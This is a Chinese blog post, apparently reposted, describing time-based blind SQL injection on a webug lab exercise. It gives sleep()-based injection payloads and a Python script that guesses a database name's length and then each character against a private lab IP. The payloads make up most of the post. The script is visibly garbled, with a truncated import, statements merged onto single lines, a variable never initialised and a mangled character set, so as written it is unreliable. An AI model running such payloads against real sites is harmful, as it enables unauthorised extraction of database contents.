当测试注入漏洞时,页面没有返还结果,连报错都没有时,可以考虑延时。
比如这条语句 ?type=1 and if(length(database())=%d,sleep(5),1)
如果这条语句被服务器正确执行,那么服务器返回数据强要比平时慢5秒,通过比较时间来判断正确还是错误。
这就给我们编程提供了思路,如果要猜测一个字段可以先猜测其长度,在一个猜每一个字符
这次依旧是webug的一道练习题
mport requests
import time
payloads = ‘qwertyuio[email protected]_.}{,‘
print( ‘start get length...‘)def long():
for l in range(1,21):
startTime1=time.time()
url1 = "http://192.168.148.129/pentest/test/time/?type=1 and if(length(database())=%d,sleep(5),1)"%(l)
response1 = requests.get(url1)
if time.time() - startTime1 > 5:
length=l
print ("the length is " + str(length))
break return length
def inject():
print( ‘start database sql injection...‘)
for d in range(1,length+1):
for payload in payloads:
startTime2=time.time()
url2 = "http://192.168.148.129/pentest/test/time/?type=1 and if(substr(database(),‘%d‘,1)=‘%s‘,sleep(5),1)"%(d,payload)
response2 = requests.get(url2) #
if time.time() - startTime2 > 5:
database+=payload
print(database)
break return database
if __name__ == ‘__main__‘:
length=long() dabase=inject()
print("the database is " + database)
思路就是先猜字段长度,在与payload里的每个字符进行比较得到最终结果。
原文地址:https://www.cnblogs.com/hatkids/p/8974200.html
时间: 2024-10-08 22:43:59